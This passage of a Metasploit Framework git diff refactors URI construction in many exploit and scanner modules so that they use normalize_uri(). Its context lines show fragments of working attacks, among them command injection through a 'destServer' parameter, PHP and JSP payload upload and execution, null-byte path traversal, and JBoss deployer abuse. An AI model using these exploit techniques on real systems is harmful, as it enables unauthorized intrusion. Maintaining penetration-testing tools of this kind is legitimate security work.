.../windows/http/sysax_create_folder.rb | 8 +++--- .../exploits/windows/iis/ms02_065_msadc.rb | 2 +- modules/exploits/windows/iis/msadc.rb | 4 +-- 73 files changed, 212 insertions(+), 253 deletions(-) diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 25af468599a9..465e0ed78a07 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -96,7 +96,9 @@ def run juhash = Digest::MD5.hexdigest(juarray) juhash = juhash[0..9] # shortMD5 value for use as juhash - file_uri = "#{uri}/index.php?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}" + uri_base_path = normalize_uri(uri, '/index.php') + + file_uri = "#{uri_base_path}?jumpurl=#{jumpurl}&juSecure=1&locationData=#{locationData}&juHash=#{juhash}" vprint_status("Checking Encryption Key [#{i}/1000]: #{final}") begin diff --git a/modules/auxiliary/admin/tikiwiki/tikidblib.rb b/modules/auxiliary/admin/tikiwiki/tikidblib.rb index 231b4fa36077..695443c52805 100644 --- a/modules/auxiliary/admin/tikiwiki/tikidblib.rb +++ b/modules/auxiliary/admin/tikiwiki/tikidblib.rb @@ -47,8 +47,8 @@ def initialize(info = {}) def run print_status("Establishing a connection to the target...") - uri = normalize_uri(datastore['URI']) - rpath = uri + "/tiki-lastchanges.php?days=1&offset=0&sort_mode=" + uri = normalize_uri(datastore['URI'], '/tiki-lastchanges.php') + rpath = uri + "?days=1&offset=0&sort_mode=" res = send_request_raw({ 'uri' => rpath, diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index ee80b7a6242f..f886d688b6aa 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -39,7 +39,7 @@ def initialize(info = {}) def run begin o = { - 'uri' => normalize_uri(datastore['URI']) || '/', + 'uri' => normalize_uri(datastore['URI']), 'headers' => { 'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100 } diff --git a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb index db04a3a2f8fe..b677c8776319 100644 --- a/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb +++ b/modules/auxiliary/gather/wp_w3_total_cache_hash_extract.rb @@ -91,7 +91,7 @@ def run_host(ip) key="w3tc_#{host}_#{site_id}_sql_#{query_md5}" key_md5 = ::Rex::Text.md5(key) hash_path = "/#{key_md5[0,1]}/#{key_md5[1,1]}/#{key_md5[2,1]}/#{key_md5}" - url = normalize_uri("/#{wordpress_url}#{datastore["WP_CONTENT_DIR"]}/w3tc/dbcache") + url = normalize_uri(wordpress_url, datastore["WP_CONTENT_DIR"], "/w3tc/dbcache") uri << hash_path result = nil diff --git a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb index 7f7166f93e90..13dc14ef16c9 100644 --- a/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb +++ b/modules/auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb @@ -49,8 +49,7 @@ def initialize(info = {}) def run_host(ip) - base = normalize_uri(target_uri.path) - base << '/' if base[-1,1] != '/' + base = target_uri.path peer = "#{ip}:#{rport}" fname = datastore['FILE'] @@ -61,7 +60,7 @@ def run_host(ip) res = send_request_cgi({ 'method' => 'GET', 'encode_params' => false, - 'uri' => "#{base}gmap/view_overlay.php", + 'uri' => normalize_uri(base, "gmap/view_overlay.php"), 'vars_get' => { 'overlay_type' => "#{traverse}#{fname}%00" } diff --git a/modules/auxiliary/scanner/http/clansphere_traversal.rb b/modules/auxiliary/scanner/http/clansphere_traversal.rb index 5919941a7530..f851e2596b9e 100644 --- a/modules/auxiliary/scanner/http/clansphere_traversal.rb +++ b/modules/auxiliary/scanner/http/clansphere_traversal.rb @@ -46,7 +46,6 @@ def initialize(info = {}) def run_host(ip) base = normalize_uri(target_uri.path) - base << '/' if base[-1,1] != '/' peer = "#{ip}:#{rport}" @@ -58,7 +57,7 @@ def run_host(ip) res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{base}index.php", + 'uri' => normalize_uri(base, "index.php"), 'cookie' => "blah=blah; cs_lang=#{traverse}#{f}%00.png" }) diff --git a/modules/auxiliary/scanner/http/concrete5_member_list.rb b/modules/auxiliary/scanner/http/concrete5_member_list.rb index af224e664ad5..23e159e537ab 100644 --- a/modules/auxiliary/scanner/http/concrete5_member_list.rb +++ b/modules/auxiliary/scanner/http/concrete5_member_list.rb @@ -44,10 +44,10 @@ def peer end def run_host(rhost) - url = normalize_uri(datastore['URI']) + url = normalize_uri(datastore['URI'], '/index.php/members') begin - res = send_request_raw({'uri' => "#{url}/index.php/members"}) + res = send_request_raw({'uri' => url}) rescue ::Rex::ConnectionError print_error("#{peer} Unable to connect to #{url}") diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb index af6efdbdfcb7..4fdb5bab9317 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb @@ -60,8 +60,10 @@ def run_host(ip) print_status("#{@peer} - Connecting to SiteScope SOAP Interface") + uri = normalize_uri(@uri, 'services/APISiteScopeImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APISiteScopeImpl", + 'uri' => uri, 'method' => 'GET'}) if not res @@ -91,8 +93,10 @@ def access_configuration print_status("#{@peer} - Retrieving the SiteScope Configuration") + uri = normalize_uri(@uri, 'services/APISiteScopeImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APISiteScopeImpl", + 'uri' => uri, 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, diff --git a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb index e58d4282b9c2..e3fb1fe573e2 100644 --- a/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb +++ b/modules/auxiliary/scanner/http/hp_sitescope_loadfilecontent_fileaccess.rb @@ -59,8 +59,10 @@ def run_host(ip) print_status("#{@peer} - Connecting to SiteScope SOAP Interface") + uri = normalize_uri(@uri, 'services/APIMonitorImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APIMonitorImpl", + 'uri' => uri, 'method' => 'GET'}) if not res @@ -95,8 +97,10 @@ def accessfile print_status("#{@peer} - Retrieving the file contents") + uri = normalize_uri(@uri, 'services/APIMonitorImpl') + res = send_request_cgi({ - 'uri' => "#{@uri}services/APIMonitorImpl", + 'uri' => uri, 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, diff --git a/modules/auxiliary/scanner/http/http_put.rb b/modules/auxiliary/scanner/http/http_put.rb index f7ab2fd9a74e..f0e18eedaee8 100644 --- a/modules/auxiliary/scanner/http/http_put.rb +++ b/modules/auxiliary/scanner/http/http_put.rb @@ -81,7 +81,7 @@ def do_put(path, data) begin res = send_request_cgi( { - 'uri' => path, + 'uri' => normalize_uri(path), 'method' => 'PUT', 'ctype' => 'text/plain', 'data' => data, @@ -102,7 +102,7 @@ def do_delete(path) begin res = send_request_cgi( { - 'uri' => path, + 'uri' => normalize_uri(path), 'method' => 'DELETE', 'ctype' => 'text/html', }, 20 @@ -119,7 +119,7 @@ def do_delete(path) # Main function for the module, duh! # def run_host(ip) - path = normalize_uri(datastore['PATH']) + path = datastore['PATH'] data = datastore['FILEDATA'] if path[-1,1] != '/' diff --git a/modules/auxiliary/scanner/http/s40_traversal.rb b/modules/auxiliary/scanner/http/s40_traversal.rb index 5c0039054f26..111591aa13f0 100644 --- a/modules/auxiliary/scanner/http/s40_traversal.rb +++ b/modules/auxiliary/scanner/http/s40_traversal.rb @@ -44,7 +44,7 @@ def initialize(info = {}) end def run - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1, 1] != '/' t = "/.." * datastore['DEPTH'] @@ -52,9 +52,10 @@ def run print_status("Retrieving #{datastore['FILE']}") # No permission to access.log or proc/self/environ, so this is all we do :-/ + uri = normalize_uri(uri, 'index.php') res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}index.php/?p=#{t}#{datastore['FILE']}%00" + 'uri' => "#{uri}/?p=#{t}#{datastore['FILE']}%00" }) if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb index 730217ba95aa..01d38311ff1b 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_brute.rb @@ -70,7 +70,7 @@ def enum_user(user='administrator', pass='pass') begin res = send_request_raw({ - 'uri' => normalize_uri(datastore['URI']) + "/services/Session", + 'uri' => normalize_uri(datastore['URI'], "/services/Session"), 'method' => 'POST', 'data' => data, 'headers' => diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb index 415ca736ee01..53ee160d57e1 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_user_enum.rb @@ -44,7 +44,7 @@ def initialize def run_host(ip) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", + 'uri' => normalize_uri(datastore['URI'], "/services/listServices"), 'method' => 'GET' }, 25) return if not res diff --git a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb index be3de4bd4972..4ff8434cebd6 100644 --- a/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb +++ b/modules/auxiliary/scanner/http/sap_businessobjects_version_enum.rb @@ -43,7 +43,7 @@ def rport def run_host(ip) res = send_request_cgi({ - 'uri' => normalize_uri(datastore['URI']) + "/services/listServices", + 'uri' => normalize_uri(datastore['URI'], "/services/listServices"), 'method' => 'GET' }, 25) return if not res or res.code != 200 diff --git a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb index 1efaf6bbff13..2d642d9c4325 100644 --- a/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/http/vmware_update_manager_traversal.rb @@ -39,7 +39,7 @@ def initialize(info={}) register_options( [ Opt::RPORT(9084), - OptString.new('URIPATH', [true, 'URI path to the downloads/', '/vci/downloads/']), + OptString.new('URIPATH', [true, 'URI path to the downloads', '/vci/downloads/']), OptString.new('FILE', [true, 'Define the remote file to download', 'boot.ini']) ], self.class) end @@ -47,7 +47,7 @@ def initialize(info={}) def run_host(ip) fname = File.basename(datastore['FILE']) traversal = ".\\..\\..\\..\\..\\..\\..\\..\\" - uri = normalize_uri(datastore['URIPATH'])+ '/' + traversal + datastore['FILE'] + uri = normalize_uri(datastore['URIPATH']) + traversal + datastore['FILE'] print_status("#{rhost}:#{rport} - Requesting: #{uri}") diff --git a/modules/exploits/linux/http/dolibarr_cmd_exec.rb b/modules/exploits/linux/http/dolibarr_cmd_exec.rb index abf9fb3f4692..d295430baa26 100644 --- a/modules/exploits/linux/http/dolibarr_cmd_exec.rb +++ b/modules/exploits/linux/http/dolibarr_cmd_exec.rb @@ -115,7 +115,7 @@ def login(sid, token) end def exploit - @uri = normalize_uri(target_uri) + @uri = target_uri @uri.path << "/" if @uri.path[-1, 1] != "/" peer = "#{rhost}:#{rport}" @@ -141,7 +141,7 @@ def exploit print_status("#{peer} - Sending malicious request...") res = send_request_cgi({ 'method' => 'POST', - 'uri' => @uri.path + "admin/tools/export.php", + 'uri' => normalize_uri(@uri.path, "admin/tools/export.php"), 'cookie' => sid, 'vars_post' => { 'token' => token, diff --git a/modules/exploits/linux/http/symantec_web_gateway_exec.rb b/modules/exploits/linux/http/symantec_web_gateway_exec.rb index cd1b6859c8bc..10a211bc1323 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_exec.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_exec.rb @@ -69,7 +69,7 @@ def check end def exploit - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @@ -80,7 +80,7 @@ def exploit print_status("#{peer} - Sending Command injection") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}spywall/ipchange.php", + 'uri' => normalize_uri(uri, 'spywall/ipchange.php'), 'data' => post_data }) diff --git a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb index 58b8c6e90fcc..6a17584b58b8 100644 --- a/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb +++ b/modules/exploits/linux/http/symantec_web_gateway_file_upload.rb @@ -80,7 +80,7 @@ def on_new_session(client) end def exploit - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @@ -97,7 +97,7 @@ def exploit print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}spywall/blocked_file.php", + 'uri' => normalize_uri(uri, "spywall/blocked_file.php"), 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s }) diff --git a/modules/exploits/linux/http/vcms_upload.rb b/modules/exploits/linux/http/vcms_upload.rb index d5f5fc8acd53..8ed47f8b1b22 100644 --- a/modules/exploits/linux/http/vcms_upload.rb +++ b/modules/exploits/linux/http/vcms_upload.rb @@ -79,7 +79,7 @@ def check def exploit peer = "#{rhost}:#{rport}" - base = normalize_uri(target_uri.path) + base = target_uri.path base << '/' if base[-1,1] != '/' @payload_name = "#{rand_text_alpha(5)}.php" @@ -94,7 +94,7 @@ def exploit print_status("#{peer} Uploading payload: #{@payload_name}") res = send_request_cgi({ - 'uri' => "#{base}includes/inline_image_upload.php", + 'uri' => normalize_uri(base, 'includes/inline_image_upload.php'), 'method' => 'POST', 'ctype' => 'multipart/form-data; boundary=----x', 'data' => post_data diff --git a/modules/exploits/linux/http/webcalendar_settings_exec.rb b/modules/exploits/linux/http/webcalendar_settings_exec.rb index 4bc1f62b3a6a..7e0086bc12a1 100644 --- a/modules/exploits/linux/http/webcalendar_settings_exec.rb +++ b/modules/exploits/linux/http/webcalendar_settings_exec.rb @@ -73,8 +73,7 @@ def check def exploit peer = "#{rhost}:#{rport}" - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1, 1] != '/' + uri = target_uri.path print_status("#{peer} - Housing php payload...") @@ -86,7 +85,7 @@ def exploit post_data << "\n"*2 send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}install/index.php", + 'uri' => normalize_uri(uri, 'install/index.php'), 'data' => post_data }) @@ -95,7 +94,7 @@ def exploit # Execute our payload send_request_raw({ 'method' => 'GET', - 'uri' => "#{uri}includes/settings.php", + 'uri' => normalize_uri(uri, 'includes/settings.php'), 'headers' => { 'Cmd' => Rex::Text.encode_base64(payload.encoded) } diff --git a/modules/exploits/linux/http/webid_converter.rb b/modules/exploits/linux/http/webid_converter.rb index 4c7fd858007e..e0c28f013938 100644 --- a/modules/exploits/linux/http/webid_converter.rb +++ b/modules/exploits/linux/http/webid_converter.rb @@ -55,12 +55,12 @@ def initialize(info = {}) end def check - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', - 'uri' => uri + "docs/changes.txt" + 'uri' => normalize_uri(uri, "docs/changes.txt") }) if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/ @@ -122,7 +122,7 @@ def on_new_session(client) def exploit - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @@ -131,7 +131,7 @@ def exploit print_status("#{peer} - Injecting the PHP payload") response = send_request_cgi({ - 'uri' => uri + "converter.php", + 'uri' => normalize_uri(uri, "converter.php"), 'method' => "POST", 'vars_post' => { "action" => "convert", @@ -149,7 +149,7 @@ def exploit timeout = 0.01 response = send_request_cgi({ - 'uri' => uri + "includes/currencies.php", + 'uri' => normalize_uri(uri, "includes/currencies.php"), 'method' => "GET", 'headers' => { 'Connection' => "close", diff --git a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb index d9c8e87e8dbc..404bf9f31d65 100644 --- a/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb +++ b/modules/exploits/multi/http/ajaxplorer_checkinstall_exec.rb @@ -57,13 +57,13 @@ def initialize(info = {}) end def check - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' clue = Rex::Text::rand_text_alpha(rand(5) + 5) res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}plugins/access.ssh/checkInstall.php", + 'uri' => normalize_uri(uri, 'plugins/access.ssh/checkInstall.php'), 'vars_get' => { 'destServer' => "||echo #{clue}" } @@ -79,13 +79,12 @@ def check def exploit peer = "#{rhost}:#{rport}" - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path # Trigger the command execution bug res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}plugins/access.ssh/checkInstall.php", + 'uri' => normalize_uri(uri, "plugins/access.ssh/checkInstall.php"), 'vars_get' => { 'destServer' => "||#{payload.encoded}" diff --git a/modules/exploits/multi/http/apprain_upload_exec.rb b/modules/exploits/multi/http/apprain_upload_exec.rb index 06e6fdc6a04e..fc485ebc4420 100644 --- a/modules/exploits/multi/http/apprain_upload_exec.rb +++ b/modules/exploits/multi/http/apprain_upload_exec.rb @@ -59,12 +59,12 @@ def initialize(info={}) end def check - uri = normalize_uri(target_uri.path) + uri = target_uri.path uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}addons/uploadify/uploadify.php" + 'uri' => normalize_uri(uri, 'addons/uploadify/uploadify.php') }) if res and res.code == 200 and res.body.empty? @@ -75,8 +75,7 @@ def check end def exploit - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path peer = "#{rhost}:#{rport}" payload_name = Rex::Text.rand_text_alpha(rand(10) + 5) + '.php' @@ -91,7 +90,7 @@ def exploit print_status("#{peer} - Sending PHP payload (#{payload_name})") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{uri}addons/uploadify/uploadify.php", + 'uri' => normalize_uri(uri, "addons/uploadify/uploadify.php"), 'ctype' => 'multipart/form-data; boundary=o0oOo0o', 'data' => post_data }) @@ -107,7 +106,7 @@ def exploit # Execute our payload res = send_request_cgi({ 'method' => 'GET', - 'uri' => "#{uri}addons/uploadify/uploads/#{payload_name}" + 'uri' => normalize_uri(uri, "addons/uploadify/uploads/#{payload_name}") }) # If we don't get a 200 when we request our malicious payload, we suspect diff --git a/modules/exploits/multi/http/auxilium_upload_exec.rb b/modules/exploits/multi/http/auxilium_upload_exec.rb index 2a314cb411de..cb0147c8c469 100644 --- a/modules/exploits/multi/http/auxilium_upload_exec.rb +++ b/modules/exploits/multi/http/auxilium_upload_exec.rb @@ -56,11 +56,12 @@ def initialize(info={}) def check - uri = normalize_uri(target_uri.path) - uri << '/' if uri[-1,1] != '/' + uri = target_uri.path base = File.dirname("#{uri}.") - res = send_request_raw({'uri'=>"#{base}/admin/sitebanners/upload_banners.php"}) + res = send_request_raw({ + 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php") + }) if res and res.body =~ /\<title\>Pet Rate Admin \- Banner Manager\<\/title\>/ return Exploit::CheckCode::Appears else @@ -83,7 +84,7 @@ def upload_exec(base, php_fname, p) print_status("#{@peer} - Uploading payload (#{p.length.to_s} bytes)...") res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}/admin/sitebanners/upload_banners.php", + 'uri' => normalize_uri("#{base}/admin/sitebanners/upload_banners.php"), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => post_data, }) @@ -94,7 +95,7 @@ def upload_exec(base, php_fname, p) end print_status("#{@peer} - Requesting '#{php_fname}'...") - res = send_request_raw({'uri'=>"#{base}/banners/#{php_fname}"}) + res = send_request_raw({'uri'=>normalize_uri("#{base}/banners/#{php_fname}")}) if res and res.code == 404 print_error("#{@peer} - Upload unsuccessful: #{res.code.to_s}") return diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index f9060db244ba..565d73a293c1 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -267,7 +267,7 @@ def exploit res = send_request_cgi( { 'method' => 'POST', - 'uri' => "#{rpath}/axis2-admin/login", + 'uri' => normalize_uri(rpath, '/axis2-admin/login'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "userName=#{user}&password=#{pass}&submit=+Login+", }, 25) @@ -303,7 +303,7 @@ def exploit res = send_request_cgi( { 'method' => 'POST', - 'uri' => "#{rpath}/axis2-admin/login", + 'uri' => normalize_uri(rpath, '/axis2-admin/login'), 'ctype' => 'application/x-www-form-urlencoded', 'data' => "userName=#{user}&password=#{pass}&submit=+Login+", }, 25) diff --git a/modules/exploits/multi/http/cuteflow_upload_exec.rb b/modules/exploits/multi/http/cuteflow_upload_exec.rb index 40dfc9a09bf8..2f413cec6bf5 100644 --- a/modules/exploits/multi/http/cuteflow_upload_exec.rb +++ b/modules/exploits/multi/http/cuteflow_upload_exec.rb @@ -62,7 +62,7 @@ def check base << '/' if base[-1, 1] != '/' res = send_request_raw({ 'method' => 'GET', - 'uri' => "#{base}" + 'uri' => base }) if res.body =~ /\<strong style\=\"font\-size\:8pt\;font\-weight\:normal\"\>Version 2\.11\.2\<\/strong\>\<br\>/ @@ -90,7 +90,7 @@ def upload(base, fname, file) # upload res = send_request_cgi({ 'method' => 'POST', - 'uri' => "#{base}pages/restart_circulation_values_write.php", + 'uri' => normalize_uri(base, "pages/restart_circulation_values_write.php"), 'ctype' => "multipart/form-data; boundary=#{boundary}", 'data' => data_post, }) @@ -117,7 +117,7 @@ def exploit print_status("#{@peer} - Retrieving file: #{fname}") send_request_raw({ 'method' => 'GET', - 'uri' => "#{base}upload/___1/#{fname}" + 'uri' => normalize_uri(base, "upload/___1/#{fname}") }) handler diff --git a/modules/exploits/multi/http/horde_href_backdoor.rb b/modules/exploits/multi/http/horde_href_backdoor.rb index 0c36c206c2ce..e5df62a1a8ff 100644 --- a/modules/exploits/multi/http/horde_href_backdoor.rb +++ b/modules/exploits/multi/http/horde_href_backdoor.rb @@ -59,14 +59,14 @@ def initialize(info = {}) def exploit # Make sure the URI begins with a slash - uri = normalize_uri(datastore['URI']) + uri = datastore['URI'] function = "passthru" key = Rex::Text.rand_text_alpha(6) arguments = "echo #{key}`"+payload.raw+"`#{key}" res = send_request_cgi({ - 'uri' => uri + "/services/javascript.php", + 'uri' => normalize_uri(uri, "/services/javascript.php"), 'method' => 'POST', 'ctype' => 'application/x-www-form-urlencoded', 'data' => "app="+datastore['APP']+"&file=open_calendar.js", diff --git a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb index f196e486192f..4b34db401024 100644 --- a/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb +++ b/modules/exploits/multi/http/hp_sitescope_uploadfileshandler.rb @@ -101,7 +101,7 @@ def exploit # Generate an initial JSESSIONID print_status("#{@peer} - Retrieving an initial JSESSIONID") res = send_request_cgi( - 'uri' => "#{@uri}servlet/Main", + 'uri' => normalize_uri(@uri, 'servlet/Main'), 'method' => 'POST' ) @@ -118,7 +118,7 @@ def exploit print_status("#{@peer} - Authenticating on HP SiteScope Configuration") res = send_request_cgi( { - 'uri' => "#{@uri}j_security_check", + 'uri' => normalize_uri(@uri, 'j_security_check'), 'method' => 'POST', 'data' => login_data, 'ctype' => "application/x-www-form-urlencoded", @@ -264,7 +264,7 @@ def exploit print_status("#{@peer} - Uploading the JSP") res = send_request_cgi( { - 'uri' => "#{@uri}upload?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", + 'uri' => normalize_uri(@uri, 'upload') + "?REMOTE_HANDLER_KEY=UploadFilesHandler&UploadFilesHandler.file.name=#{traversal}#{@jsp_name}.jsp&UploadFilesHandler.ovveride=true", 'method' => 'POST', 'data' => post_data.to_s, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", @@ -285,7 +285,7 @@ def exploit print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") send_request_cgi( { - 'uri' => "#{@uri}#{@jsp_name}.jsp", + 'uri' => normalize_uri(@uri, "#{@jsp_name}.jsp"), 'method' => 'GET', 'headers' => { @@ -334,7 +334,7 @@ def create_user data << "</wsns0:Envelope>" + "\r\n" res = send_request_cgi({ - 'uri' => "#{@uri}services/APIPreferenceImpl", + 'uri' => normalize_uri(@uri, 'services/APIPreferenceImpl'), 'method' => 'POST', 'ctype' => 'text/xml; charset=UTF-8', 'data' => data, diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index d2ea9a7cc8a9..07d5eb2adaef 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -391,7 +391,7 @@ def auto_target end def query_serverinfo - path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' + path = normalize_uri(datastore['PATH'], '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo') res = send_request_raw( { 'uri' => path, @@ -449,13 +449,13 @@ def invoke_bshscript(bsh_script, pkg) if (datastore['VERB']== "POST") res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'data' => params }) else res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + params + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{params}" }, 30) end res diff --git a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb index 8808c158ffd9..422b8f83927b 100644 --- a/modules/exploits/multi/http/jboss_deploymentfilerepository.rb +++ b/modules/exploits/multi/http/jboss_deploymentfilerepository.rb @@ -277,14 +277,14 @@ def upload_file(base_name, jsp_name, content) if (datastore['VERB'] == "POST") res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'method' => datastore['VERB'], 'data' => data }, 5) else res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor?' + data, + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor') + "?#{data}", 'method' => datastore['VERB'], }, 30) end @@ -308,14 +308,14 @@ def delete_file(folder, name, ext) if (datastore['VERB'] == "POST") res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'method' => datastore['VERB'], 'data' => data }, 5) else res = send_request_cgi( { - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data, + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor;index.jsp') + "?#{data}", 'method' => datastore['VERB'], }, 30) end @@ -378,7 +378,7 @@ def auto_target def query_serverinfo - path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo' + path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo' res = send_request_raw( { 'uri' => path, diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index db63a96cb482..7c36c1fa1624 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -176,7 +176,7 @@ def exploit if (datastore['VERB'] == "POST") res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'vars_post' => { 'action' => 'invokeOpByName', @@ -189,7 +189,7 @@ def exploit else res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'vars_get' => { 'action' => 'invokeOpByName', @@ -275,7 +275,7 @@ def exploit print_status("Undeploying #{app_base} ...") res = send_request_cgi({ 'method' => datastore['VERB'], - 'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor', + 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'), 'vars_post' => { 'action' => 'invokeOpByName', @@ -314,7 